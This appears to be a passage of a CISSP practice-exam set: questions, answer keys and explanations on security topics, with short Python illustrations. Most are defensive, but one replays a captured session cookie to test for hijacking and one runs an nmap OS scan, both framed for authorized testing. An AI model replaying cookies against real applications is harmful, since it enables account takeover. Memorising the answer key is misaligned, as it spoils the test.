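# Assumes nmap is installed and the scan is in scope; -O requests OS
# detection (usually requires root). The target address is illustrative.
import subprocess

result = subprocess.run(
    ["nmap", "-O", "192.0.2.10"],  # RFC 5737 example address
    capture_output=True, text=True,
)
print(result.stdout)
```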
The European Union (EU) General Data Protection Regulation (GDPR) requires organizations to implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk. The Data Owner should therefore consider which of the following requirements?
Data masking and encryption of personal data
Only to use encryption protocols approved by EU
Anonymization of personal data when transmitted to sources outside the EU
Never to store personal data of EU citizens outside the EU
The GDPR is a regulation that aims to protect the privacy and security of the personal data of individuals in the EU. The GDPR requires organizations to implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk. The data owner, who is the person or entity that has the authority and responsibility for the personal data, should therefore consider data masking and encryption of personal data as possible technical measures. Data masking is a technique that replaces or obscures sensitive or identifying information in the personal data with fictitious or random data, such as replacing names with pseudonyms or masking credit card numbers with asterisks. Data encryption is a technique that transforms the personal data into an unreadable or unintelligible form using a secret key, such that only authorized parties with the correct key can access or decrypt the personal data. Data masking and encryption can protect the personal data from unauthorized access, disclosure, or modification, and reduce the impact of data breaches or leaks. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 2: Asset Security, pp. 323-324; CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3: Asset Security, pp. 269-270.
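A minimal sketch of the two measures follows: masking a card number down to its last four digits and deterministically pseudonymizing a name. The salt and formats are illustrative assumptions; a real deployment would manage keys and salts as protected secrets.

```python
# Minimal sketch of data masking and pseudonymization. Formats, the salt,
# and the output scheme are illustrative assumptions.
import hashlib

def mask_card(number: str) -> str:
    digits = number.replace(" ", "")
    return "*" * (len(digits) - 4) + digits[-4:]

def pseudonymize(name: str, salt: str = "example-salt") -> str:
    # Deterministic pseudonym; a real deployment would protect the salt/key.
    return "user-" + hashlib.sha256((salt + name).encode()).hexdigest()[:8]

print(mask_card("4111 1111 1111 1111"))  # ************1111
print(pseudonymize("Alice Example"))     # e.g., user-3f2a9c41
```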
Asymmetric algorithms are used for which of the following when using Secure Sockets Layer/Transport Layer Security (SSL/TLS) for implementing network security?
Peer authentication
Payload data encryption
Session encryption
Hashing digest
Asymmetric algorithms are used for peer authentication when using Secure Sockets Layer/Transport Layer Security (SSL/TLS) for implementing network security. SSL/TLS is a protocol that provides secure communication over the internet by encrypting and authenticating the data and the parties involved. Asymmetric algorithms are cryptographic algorithms that use two different keys, a public key and a private key, for encryption and decryption. Asymmetric algorithms are used for peer authentication in SSL/TLS, which is the process of verifying the identity and trustworthiness of the client and the server. Peer authentication is done by exchanging digital certificates, which are electronic documents that contain the public key and other information of the owner, and are signed by a trusted third party, such as a certificate authority. The client and the server validate each other’s certificates using asymmetric algorithms, and establish a secure connection if the certificates are valid. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4: Communication and Network Security, page 172. CISSP Practice Exam – FREE 20 Questions and Answers, Question 16.
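In Python's standard library, this certificate-based peer authentication is visible in a few lines. A minimal client-side sketch; the host is illustrative, and ssl.create_default_context() loads the system's trusted CA certificates and enables hostname verification:

```python
# Minimal sketch: a TLS client that authenticates the server via its
# certificate (asymmetric crypto), then exchanges data over the negotiated
# session. The host/port are illustrative.
import socket
import ssl

context = ssl.create_default_context()  # trusted CAs + peer verification
with socket.create_connection(("example.com", 443)) as sock:
    with context.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.version())                 # negotiated protocol, e.g. TLSv1.3
        print(tls.getpeercert()["subject"])  # server identity from certificate
```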
A criminal organization is planning an attack on a government network. Which of the following scenarios presents the HIGHEST risk to the organization?
Network is flooded with communication traffic by the attacker.
Organization loses control of their network devices.
Network management communications is disrupted.
Attacker accesses sensitive information regarding the network topology.
The scenario that presents the highest risk to the organization is the one where the organization loses control of their network devices. Network devices are the hardware components that enable the communication and connectivity between the systems and networks, such as the switches, routers, firewalls, or servers. Losing control of the network devices means that the organization cannot manage, configure, or monitor the network devices, and that the network devices are compromised, manipulated, or controlled by the attacker. Losing control of the network devices can have severe consequences for the organization, such as interception or redirection of traffic, disruption or denial of services, and a persistent foothold from which the attacker can reach other systems on the network.
As a security manager, which of the following is the MOST effective practice for providing value to an organization?
Assess business risk and apply security resources accordingly
Coordinate security implementations with internal audit
Achieve compliance regardless of related technical issues
Identify confidential information and protect it
Assessing business risk and applying security resources accordingly is the most effective practice for providing value to an organization as a security manager. Business risk is the potential for loss or harm to the organization’s assets, reputation, or objectives due to internal or external threats. Security resources are the people, processes, and technologies that are used to protect the organization’s information and systems. By assessing the business risk, the security manager can identify and prioritize the most critical and likely threats and vulnerabilities, and align the security resources with the organization’s goals and needs. This way, the security manager can provide value by optimizing the security performance, reducing the security costs, and enhancing the business outcomes. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 5. CISSP Practice Exam – FREE 20 Questions and Answers, Question 13.
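The idea of applying resources according to business risk reduces to a simple ranking exercise. A minimal sketch, with illustrative assets and likelihood-times-impact scores:

```python
# Minimal sketch: rank assets by a simple likelihood x impact risk score so
# that security resources go to the highest business risk first. The assets
# and scores are illustrative assumptions.
risks = [
    {"asset": "customer database", "likelihood": 0.6, "impact": 9},
    {"asset": "public website",    "likelihood": 0.8, "impact": 4},
    {"asset": "HR fileshare",      "likelihood": 0.3, "impact": 7},
]

for r in sorted(risks, key=lambda r: r["likelihood"] * r["impact"], reverse=True):
    print(f'{r["asset"]}: risk score {r["likelihood"] * r["impact"]:.1f}')
```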
What should be used immediately after a Business Continuity Plan (BCP) has been invoked?
Resumption procedures describing the actions to be taken to return to normal business operations
Emergency procedures describing the necessary actions to be taken following an incident that jeopardizes business operations
Fallback procedures describing what actions are to be taken to move essential business activities to alternative temporary locations
Maintenance schedule describing how and when the plan will be tested, and the process for maintaining the plan
Emergency procedures are the first step in the business continuity process, as they aim to protect the safety of people and assets, and to minimize the impact of the incident. Emergency procedures should be used immediately after a BCP has been invoked, as they provide guidance on how to respond to the crisis and restore critical functions as soon as possible. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Business Continuity and Disaster Recovery Planning, page 353; [Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 7: Business Continuity Planning, page 487]
Which of the following is the BEST method a security practitioner can use to ensure that systems and sub-systems gracefully handle invalid input?
Unit testing
Integration testing
Negative testing
Acceptance testing
Negative testing is the best method a security practitioner can use to ensure that systems and sub-systems gracefully handle invalid input. Negative testing is a type of software testing that involves providing invalid, unexpected, or erroneous input to the system or sub-system, and verifying how it responds or handles the input. Negative testing can help to identify and eliminate bugs, errors, exceptions, and vulnerabilities in the system or sub-system, and to ensure that it does not crash, freeze, or behave unpredictably when faced with invalid input. Negative testing can also help to improve the security, reliability, and usability of the system or sub-system, and to ensure that it meets the functional and non-functional requirements. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 10, page 882; 100 CISSP Questions, Answers and Explanations, Question 17.
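A minimal pytest sketch of negative testing follows: a hypothetical parse_age function is fed invalid inputs, and the test passes only if each one is rejected with a clear error rather than accepted or crashing unhandled:

```python
# Minimal sketch of negative testing with pytest. `parse_age` is a
# hypothetical function under test, not from any real codebase.
import pytest

def parse_age(value: str) -> int:
    age = int(value)  # raises ValueError for non-numeric input
    if not 0 <= age <= 150:
        raise ValueError("age out of range")
    return age

@pytest.mark.parametrize("bad_input", ["", "abc", "-5", "999", "12.5"])
def test_parse_age_rejects_invalid_input(bad_input):
    with pytest.raises(ValueError):
        parse_age(bad_input)
```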
Which of the following trust services principles refers to the accessibility of information used by the systems, products, or services offered to a third-party provider’s customers?
Security
Privacy
Access
Availability
Availability is the trust services principle that refers to the accessibility of information used by the systems, products, or services offered to a third-party provider’s customers. Trust services principles are the criteria and guidelines that are used to evaluate and report on the controls and processes of a service organization, such as a cloud service provider, a data center, or a payroll service. Trust services principles are based on the standards and frameworks issued by the American Institute of Certified Public Accountants (AICPA) and the Canadian Institute of Chartered Accountants (CICA). There are five trust services principles: security, availability, processing integrity, confidentiality, and privacy. Availability is the trust services principle that addresses the ability of the service organization to ensure that the systems, products, or services are accessible and operational for use by the customers as agreed or expected. Availability can be measured by various metrics, such as uptime, downtime, response time, recovery time, or service level agreements. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 20. Free daily CISSP practice questions, Question 6.
A recent information security risk assessment identified weak system access controls on mobile devices as a high risk. In order to address this risk and ensure only authorized staff access company information, which of the following should the organization implement?
Intrusion prevention system (IPS)
Multi-factor authentication (MFA)
Data loss protection (DLP)
Data at rest encryption
Multi-factor authentication (MFA) is a method of authentication that requires two or more independent factors to verify the identity of a user, such as something you know, something you have, or something you are. MFA can help address the risk of weak system access controls on mobile devices, as it provides a higher level of security than a single factor, such as a password. MFA can prevent unauthorized access to company information, even if the mobile device is lost, stolen, or compromised. An intrusion prevention system (IPS) is a device or software that monitors and blocks network traffic based on predefined rules or signatures. An IPS can help protect the network from external attacks, but it does not address the system access controls on mobile devices. Data loss protection (DLP) is a system or tool that prevents the unauthorized disclosure, transfer, or leakage of sensitive data. DLP can help protect the company information from being exposed, but it does not address the system access controls on mobile devices. Data at rest encryption is a technique that encrypts the data that is stored on a device or a media. Data at rest encryption can help protect the company information from being accessed, even if the mobile device is lost, stolen, or compromised, but it does not address the system access controls on mobile devices.
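As one common second factor, a time-based one-time password (TOTP, in the style of RFC 6238) can be sketched with only the standard library. The shared secret below is illustrative; real deployments provision and store it securely:

```python
# Minimal sketch of a TOTP second factor (RFC 6238 style: SHA-1, 30 s step,
# 6 digits). The shared secret is an illustrative placeholder.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = struct.pack(">Q", int(time.time()) // step)
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation per RFC 4226
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # e.g. "492039"; changes every 30 seconds
```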
Which of the following attributes could be used to describe a protection mechanism of an open design methodology?
It must be tamperproof to protect it from malicious attacks.
It can facilitate independent confirmation of the design security.
It can facilitate blackbox penetration testing.
It exposes the design to vulnerabilities and malicious attacks.
One of the attributes that could be used to describe a protection mechanism of an open design methodology is that it can facilitate independent confirmation of the design security, meaning that it can enable external parties, such as researchers, experts, or users, to verify, validate, or evaluate the security properties and features of the design, and to provide feedback, suggestions, or improvements to the design. Independent confirmation of the design security can increase the confidence and trust in the design, as well as identify and resolve any security flaws, vulnerabilities, or weaknesses in the design. It must be tamperproof to protect it from malicious attacks, it can facilitate blackbox penetration testing, and it exposes the design to vulnerabilities and malicious attacks are not attributes that could be used to describe a protection mechanism of an open design methodology, as they are either not related to the openness or transparency of the design, or they are negative or undesirable consequences of the open design methodology.
What is the BEST way to establish identity over the internet?
Challenge Handshake Authentication Protocol (CHAP) and strong passwords
Internet Mail Access Protocol (IMAP) with Triple Data Encryption Standard (3DES)
Remote Authentication Dial-In User Service (RADIUS) server with hardware tokens
Remote user authentication via Simple Object Access Protocol (SOAP)
The best way to establish identity over the internet is to use a Remote Authentication Dial-In User Service (RADIUS) server with hardware tokens. A RADIUS server is a server that provides centralized authentication, authorization, and accounting (AAA) services for remote or network access clients, such as users or devices that connect to a network or a system over the internet. A RADIUS server can authenticate the identity of the clients by using various methods or protocols, such as passwords, certificates, or tokens. A hardware token is a physical device, such as a smart card, a USB device, or a key fob, that generates and displays a one-time password (OTP) or a personal identification number (PIN) that is used to authenticate the identity of the client. A hardware token can provide a strong and secure way of establishing identity over the internet, as it adds an extra factor of authentication, and it makes the identity verification unpredictable and resistant to attacks or theft. Using a RADIUS server with hardware tokens is the best way to establish identity over the internet, as it combines the advantages of centralized and standardized AAA services, and the benefits of strong and secure authentication methods. Challenge Handshake Authentication Protocol (CHAP) and strong passwords, Internet Mail Access Protocol (IMAP) with Triple Data Encryption Standard (3DES), and remote user authentication via Simple Object Access Protocol (SOAP) are not the best ways to establish identity over the internet, as they are either not as effective or not as efficient as using a RADIUS server with hardware tokens, or they serve different purposes or functions than establishing identity over the internet.
Which of the following vulnerabilities can be BEST detected using automated analysis?
Valid cross-site request forgery (CSRF) vulnerabilities
Multi-step process attack vulnerabilities
Business logic flaw vulnerabilities
Typical source code vulnerabilities
The type of vulnerabilities that can be best detected using automated analysis is typical source code vulnerabilities. Automated analysis is a technique that uses automated tools or software to analyze or test a system or an application, and to identify or report any errors, defects, or vulnerabilities. Automated analysis can be performed at different stages of the system or application development life cycle, such as design, coding, testing, or deployment. Typical source code vulnerabilities are the vulnerabilities that are common or frequent in the source code of a system or an application, and that are caused by coding errors, mistakes, or bad practices, such as buffer overflow, integer overflow, memory leak, or hard-coded credentials. Typical source code vulnerabilities can be best detected using automated analysis, as they can be easily scanned, checked, or verified by the automated tools or software, and they can be reported or corrected in a timely and efficient manner. Valid cross-site request forgery (CSRF) vulnerabilities, multi-step process attack vulnerabilities, or business logic flaw vulnerabilities are not the types of vulnerabilities that can be best detected using automated analysis, as they are more complex or specific in the system or the application, and they may require human intervention or judgment to analyze or test. Valid CSRF vulnerabilities are the vulnerabilities that allow an attacker to force a web browser to perform an unwanted or malicious action on a web server, such as transferring funds, changing passwords, or updating profiles, by exploiting the trust between the web browser and the web server. Multi-step process attack vulnerabilities are the vulnerabilities that allow an attacker to compromise a system or an application that involves multiple steps or stages, such as authentication, authorization, or transaction, by exploiting the weaknesses or gaps in each step or stage. Business logic flaw vulnerabilities are the vulnerabilities that allow an attacker to manipulate or bypass the business rules or the logic of a system or an application, such as workflows, validations, or calculations, by exploiting the flaws or errors in the design or the implementation of the system or the application. References: Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 21: Software Development Security, page 2010.
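To show why such flaws suit automated analysis, here is a toy scanner that flags hard-coded credentials with a single regular expression. Real static analysis (SAST) tools apply far richer rule sets and data-flow analysis; the directory and pattern are illustrative:

```python
# Minimal sketch of automated source analysis: a toy scanner for hard-coded
# credentials, one of the "typical source code vulnerabilities" such tools
# catch. The project directory and the pattern are illustrative assumptions.
import re
from pathlib import Path

PATTERN = re.compile(r'(password|secret|api_key)\s*=\s*["\'][^"\']+["\']', re.I)

def scan(root: str):
    for path in Path(root).rglob("*.py"):
        for lineno, line in enumerate(path.read_text().splitlines(), start=1):
            if PATTERN.search(line):
                print(f"{path}:{lineno}: possible hard-coded credential")

scan("src")  # illustrative project directory
```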
As part of the security assessment plan, the security professional has been asked to use a negative testing strategy on a new website. Which of the following actions would be performed?
Use a web scanner to scan for vulnerabilities within the website.
Perform a code review to ensure that the database references are properly addressed.
Establish a secure connection to the web server to validate that only the approved ports are open.
Enter only numbers in the web form and verify that the website prompts the user to enter a valid input.
A negative testing strategy is a type of software testing that aims to verify how the system handles invalid or unexpected inputs, errors, or conditions. A negative testing strategy can help identify potential bugs, vulnerabilities, or failures that could compromise the functionality, security, or usability of the system. One example of a negative testing strategy is to enter only numbers in a web form that expects a text input, such as a name or an email address, and verify that the website prompts the user to enter a valid input. This can help ensure that the website has proper input validation and error handling mechanisms, and that it does not accept or process any malicious or malformed data. A web scanner, a code review, and a secure connection are not examples of a negative testing strategy, as they do not involve providing invalid or unexpected inputs to the system.
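A minimal sketch of that action with the requests library follows. The URL, form field, and expected validation message are assumptions about a hypothetical site; only the pattern matters:

```python
# Minimal sketch: a negative test that submits numeric-only input to a text
# field and checks that the site responds with a validation prompt rather
# than accepting it. URL, field name, and message are illustrative.
import requests

resp = requests.post(
    "https://app.example.com/register",
    data={"name": "12345"},  # invalid: numbers in a name field
    timeout=10,
)
assert resp.status_code in (200, 400)
assert "enter a valid" in resp.text.lower(), "site accepted invalid input"
```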
What MUST each information owner do when a system contains data from multiple information owners?
Provide input to the Information System (IS) owner regarding the security requirements of the data
Review the Security Assessment Report (SAR) for the Information System (IS) and authorize the IS to operate.
Develop and maintain the System Security Plan (SSP) for the Information System (IS) containing the data
Move the data to an Information System (IS) that does not contain data owned by other information owners.
The information owner is the person who has the authority and responsibility for the data stored, processed, or transmitted by an Information System (IS). When a system contains data from multiple information owners, each information owner must provide input to the IS owner regarding the security requirements of the data, such as the classification, sensitivity, retention, and disposal of the data. The IS owner is the person who has the authority and responsibility for the operation and maintenance of the IS. The IS owner must ensure that the security requirements of the data are met and that the IS complies with the applicable laws and regulations. Reviewing the Security Assessment Report (SAR), developing and maintaining the System Security Plan (SSP), and moving the data to another IS are not the responsibilities of the information owner, but they may involve the information owner’s participation or approval. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Within the company, desktop clients receive Internet Protocol (IP) addresses over Dynamic Host Configuration Protocol (DHCP).
Which of the following represents a valid measure to help protect the network against unauthorized access?
Implement patch management
Implement port based security through 802.1x
Implement DHCP to assign IP address to server systems
Implement change management
Port based security through 802.1x is a valid measure to help protect the network against unauthorized access. 802.1x is an IEEE standard for port-based network access control (PNAC). It provides an authentication mechanism to devices wishing to attach to a LAN or WLAN. 802.1x authentication involves three parties: a supplicant, an authenticator, and an authentication server. The supplicant is a client device that wishes to access the network. The authenticator is a network device that provides a data link between the client and the network and can allow or block network traffic between the two, such as an Ethernet switch or wireless access point. The authentication server is a trusted server that can receive and respond to requests for network access, and can tell the authenticator if the connection is to be allowed, and various settings that should apply to that client’s connection. By implementing port based security through 802.1x, the network can prevent unauthorized devices from accessing the network resources and ensure that only authenticated and authorized devices can communicate on the network. References: IEEE 802.1X - Wikipedia; What Is 802.1X Authentication? How Does 802.1x Work? - Fortinet; 802.1X: Port-Based Network Access Control - IEEE 802
Which of the following is the MOST appropriate action when reusing media that contains sensitive data?
Erase
Sanitize
Encrypt
Degauss
The most appropriate action when reusing media that contains sensitive data is to sanitize the media. Sanitization is the process of removing or destroying all data from the media in such a way that it cannot be recovered by any means. Sanitization can be achieved by various methods, such as overwriting, degaussing, or physical destruction. Sanitization ensures that the sensitive data is not exposed or compromised when the media is reused or disposed of. Erase, encrypt, and degauss are not the most appropriate actions when reusing media that contains sensitive data, although they may be related or useful steps. Erase is the process of deleting data from the media by using the operating system or application commands or functions. Erase does not guarantee that the data is completely removed from the media, as it may leave traces or remnants that can be recovered by using special tools or techniques. Encrypt is the process of transforming data into an unreadable form by using a cryptographic algorithm and a key. Encrypt can protect the data from unauthorized access or disclosure, but it does not remove the data from the media. Encrypt also requires that the key is securely managed and stored, and that the encryption algorithm is strong and reliable. Degauss is the process of applying a strong magnetic field to the media to erase or scramble the data. Degauss can effectively sanitize magnetic media, such as hard disks or tapes, but it does not work on optical media, such as CDs or DVDs. Degauss also renders the media unusable, as it destroys the servo tracks and the firmware that are needed for the media to function properly.
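For illustration, a single-pass overwrite before deletion looks like the sketch below. This is not by itself adequate sanitization: it does not address SSD wear-leveling, journaling, or stray copies (NIST SP 800-88 describes accepted methods), but it shows the overwrite step:

```python
# Minimal sketch: single-pass random overwrite of a file before deletion.
# Illustrative only; it does not defeat SSD wear-leveling or filesystem
# copies, so it is not sufficient sanitization on its own.
import os

def overwrite_and_delete(path: str):
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        f.write(os.urandom(size))
        f.flush()
        os.fsync(f.fileno())
    os.remove(path)
```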
A security practitioner is tasked with securing the organization’s Wireless Access Points (WAP). Which of these is the MOST effective way of restricting this environment to authorized users?
Enable Wi-Fi Protected Access 2 (WPA2) encryption on the wireless access point
Disable the broadcast of the Service Set Identifier (SSID) name
Change the name of the Service Set Identifier (SSID) to a random value not associated with the organization
Create Access Control Lists (ACL) based on Media Access Control (MAC) addresses
The most effective way of restricting the wireless environment to authorized users is to enable Wi-Fi Protected Access 2 (WPA2) encryption on the wireless access point. WPA2 is a security protocol that provides confidentiality, integrity, and authentication for wireless networks. WPA2 uses Advanced Encryption Standard (AES) to encrypt the data transmitted over the wireless network, and prevents unauthorized users from intercepting or modifying the traffic. WPA2 also uses a pre-shared key (PSK) or an Extensible Authentication Protocol (EAP) to authenticate the users who want to join the wireless network, and prevents unauthorized users from accessing the network resources. WPA2 is the current standard for wireless security and is widely supported by most wireless devices. The other options are not as effective as WPA2 encryption for restricting the wireless environment to authorized users. Disabling the broadcast of the SSID name is a technique that hides the name of the wireless network from being displayed on the list of available networks, but it does not prevent unauthorized users from discovering the name by using a wireless sniffer or a brute force tool. Changing the name of the SSID to a random value not associated with the organization is a technique that reduces the likelihood of being targeted by an attacker who is looking for a specific network, but it does not prevent unauthorized users from joining the network if they know the name and the password. Creating ACLs based on MAC addresses is a technique that allows or denies access to the wireless network based on the physical address of the wireless device, but it does not prevent unauthorized users from spoofing a valid MAC address or bypassing the ACL by using a wireless bridge or a repeater. References: Secure Wireless Access Points - Fortinet; Configure Wireless Security Settings on a WAP - Cisco; Best WAP of 2024 | TechRadar.
A chemical plant wants to upgrade the Industrial Control System (ICS) to transmit data using Ethernet instead of RS422. The project manager wants to simplify administration and maintenance by utilizing the office network infrastructure and staff to implement this upgrade.
Which of the following is the GREATEST impact on security for the network?
The network administrators have no knowledge of ICS
The ICS is now accessible from the office network
The ICS does not support the office password policy
RS422 is more reliable than Ethernet
The greatest impact on security for the network is that the ICS is now accessible from the office network. This means that the ICS is exposed to more potential threats and vulnerabilities from the internet and the office network, such as malware, unauthorized access, data leakage, or denial-of-service attacks. The ICS may also have different security requirements and standards than the office network, such as availability, reliability, and safety. Therefore, connecting the ICS to the office network increases the risk of compromising the confidentiality, integrity, and availability of the ICS and the critical infrastructure it controls. The other options are not as significant as the increased attack surface and complexity of the network. References: Guide to Industrial Control Systems (ICS) Security | NIST, page 2-1; Industrial Control Systems | Cybersecurity and Infrastructure Security Agency, page 1.
As part of an application penetration testing process, session hijacking can BEST be achieved by which of the following?
Known-plaintext attack
Denial of Service (DoS)
Cookie manipulation
Structured Query Language (SQL) injection
Cookie manipulation is a technique that allows an attacker to intercept, modify, or forge a cookie, which is a piece of data that is used to maintain the state of a web session. By manipulating the cookie, the attacker can hijack the session and gain unauthorized access to the web application. Known-plaintext attack, DoS, and SQL injection are not directly related to session hijacking, although they can be used for other purposes, such as breaking encryption, disrupting availability, or executing malicious commands. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6: Communication and Network Security, page 729; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 4: Communication and Network Security, page 522.
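A minimal sketch of the test follows: a captured session cookie is replayed from a fresh client, and if the authenticated page loads, the session can be hijacked. The URL and cookie name are illustrative, and this is meant only for authorized, in-scope testing:

```python
# Minimal sketch: replay a captured session cookie from a new client, the
# core of a session-hijacking test. For authorized penetration testing only;
# the URL and cookie name are illustrative assumptions.
import requests

session = requests.Session()
# Cookie value obtained in-scope, e.g. from an intercepting proxy:
session.cookies.set("SESSIONID", "d41d8cd98f00b204e9800998ecf8427e")

resp = session.get("https://app.example.com/account", timeout=10)
# If the account page loads, the app accepts the replayed cookie and the
# session is hijackable (no binding to client IP, agent, or re-auth).
print(resp.status_code)
```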
“Stateful” differs from “Static” packet filtering firewalls by being aware of which of the following?
Difference between a new and an established connection
Originating network location
Difference between a malicious and a benign packet payload
Originating application session
Stateful firewalls differ from static packet filtering firewalls by being aware of the difference between a new and an established connection. A stateful firewall is a firewall that keeps track of the state of network connections and transactions, and uses this information to make filtering decisions. A stateful firewall maintains a state table that records the source and destination IP addresses, port numbers, protocols, and sequence numbers of each connection. A stateful firewall can distinguish between a new connection, which requires a three-way handshake to be completed, and an established connection, which has already completed the handshake and is ready to exchange data. A stateful firewall can also detect when a connection is terminated or idle, and remove it from the state table. A stateful firewall can provide more security and efficiency than a static packet filtering firewall, which only examines the header of each packet and compares it to a set of predefined rules. A static packet filtering firewall does not keep track of the state of connections, and cannot differentiate between new and established connections. A static packet filtering firewall may allow or block packets based on the source and destination IP addresses, port numbers, and protocols, but it cannot inspect the payload or the sequence numbers of the packets. A static packet filtering firewall may also be vulnerable to spoofing or flooding attacks, as it cannot verify the authenticity or validity of the packets. The other options are not aspects that stateful firewalls are aware of, but static packet filtering firewalls are not. Both types of firewalls can check the originating network location of the packets, but they cannot check the difference between a malicious and a benign packet payload, or the originating application session of the packets. References: Stateless vs Stateful Packet Filtering Firewalls - GeeksforGeeks; Stateful vs Stateless Firewall: Differences and Examples - Fortinet; Stateful Inspection Firewalls Explained - Palo Alto Networks.
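The state table at the heart of a stateful firewall can be sketched as a dictionary keyed by the connection 5-tuple. This toy version only distinguishes new from established flows; real implementations also track sequence numbers, direction, and timeouts:

```python
# Minimal sketch of a stateful filter's state table: connections are keyed
# by their 5-tuple, and a packet is allowed without a rule lookup only if it
# belongs to an existing entry. Real firewalls also track sequence numbers,
# direction, and idle timeouts; this toy shows only the state distinction.
ESTABLISHED = {}  # 5-tuple -> state

def handle_packet(src, sport, dst, dport, proto, syn=False, ack=False):
    key = (src, sport, dst, dport, proto)
    if key in ESTABLISHED:
        return "allow (established)"
    if syn and not ack:  # new connection attempt: consult the rule base
        ESTABLISHED[key] = "SYN_SENT"
        return "allow (new, per rules)"
    return "drop (no matching state)"

print(handle_packet("10.0.0.5", 40000, "93.184.216.34", 443, "tcp", syn=True))
print(handle_packet("10.0.0.5", 40000, "93.184.216.34", 443, "tcp", ack=True))
```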
Which of the following is a responsibility of the information owner?
Ensure that users and personnel complete the required security training to access the Information System (IS)
Defining proper access to the Information System (IS), including privileges or access rights
Managing identification, implementation, and assessment of common security controls
Ensuring the Information System (IS) is operated according to agreed upon security requirements
One of the responsibilities of the information owner is to define proper access to the Information System (IS), including privileges or access rights. This involves determining who can access the data, what they can do with the data, and under what conditions they can access the data. The information owner must also approve or deny the access requests and periodically review the access rights. Ensuring that users and personnel complete the required security training, managing the common security controls, and ensuring the IS is operated according to the security requirements are not the responsibilities of the information owner, but they may involve the information owner’s collaboration or consultation. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Which of the following provides the MOST comprehensive filtering of Peer-to-Peer (P2P) traffic?
Application proxy
Port filter
Network boundary router
Access layer switch
An application proxy provides the most comprehensive filtering of Peer-to-Peer (P2P) traffic. P2P traffic is a type of network traffic that involves direct communication and file sharing between peers, without the need for a central server. P2P traffic can be used for legitimate purposes, such as distributed computing, content delivery, or collaboration, but it can also be used for illegal or malicious purposes, such as piracy, malware distribution, or denial-of-service attacks. P2P traffic can also consume a lot of bandwidth and degrade the performance of other network applications. Therefore, it may be desirable to filter or block P2P traffic on a network. An application proxy is a type of firewall that operates at the application layer of the OSI model, and acts as an intermediary between the client and the server. An application proxy can inspect the content and the behavior of the network traffic, and apply granular filtering rules based on the specific application protocol, such as HTTP, FTP, or SMTP. An application proxy can also perform authentication, encryption, caching, and logging functions. An application proxy can provide the most comprehensive filtering of P2P traffic, as it can identify and block the P2P applications and protocols, regardless of the port number or the payload. An application proxy can also prevent P2P traffic from bypassing the firewall by using encryption or tunneling techniques. The other options are not as effective as an application proxy for filtering P2P traffic. A port filter is a type of firewall that operates at the transport layer of the OSI model, and blocks or allows traffic based on the source and destination port numbers. A port filter cannot inspect the content or the behavior of the traffic, and cannot distinguish between different applications that use the same port number. A port filter can also be easily evaded by P2P traffic that uses random or well-known port numbers, such as port 80 for HTTP. A network boundary router is a router that connects a network to another network, such as the Internet. A network boundary router can perform some basic filtering functions, such as access control lists (ACLs) or packet filtering, but it cannot inspect the content or the behavior of the traffic, and cannot apply granular filtering rules based on the specific application protocol. A network boundary router can also be easily evaded by P2P traffic that uses encryption or tunneling techniques. An access layer switch is a switch that connects end devices, such as PCs, printers, or servers, to the network. An access layer switch can perform some basic filtering functions, such as MAC address filtering or port security, but it cannot inspect the content or the behavior of the traffic, and cannot apply granular filtering rules based on the specific application protocol. An access layer switch can also be easily evaded by P2P traffic that uses encryption or tunneling techniques. References: Why and how to control peer-to-peer traffic | Network World; Detection and Management of P2P Traffic in Networks using Artificial Neural Networksa | Journal of Network and Systems Management; Blocking P2P And File Sharing - Cisco Meraki Documentation.
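As a small illustration of the payload inspection an application proxy can perform and a port filter cannot, the sketch below matches the well-known BitTorrent handshake signature regardless of which port the traffic uses:

```python
# Conceptual payload inspection: match a protocol signature independent of the
# port number. The BitTorrent handshake begins with the byte 0x13 followed by
# the ASCII string "BitTorrent protocol".

BT_HANDSHAKE = b"\x13BitTorrent protocol"

def looks_like_bittorrent(payload: bytes) -> bool:
    return payload.startswith(BT_HANDSHAKE)

print(looks_like_bittorrent(b"\x13BitTorrent protocol" + b"\x00" * 8))  # True
print(looks_like_bittorrent(b"GET / HTTP/1.1\r\n"))                     # False
```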
When conducting a security assessment of access controls, which activity is part of the data analysis phase?
Present solutions to address audit exceptions.
Conduct statistical sampling of data transactions.
Categorize and identify evidence gathered during the audit.
Collect logs and reports.
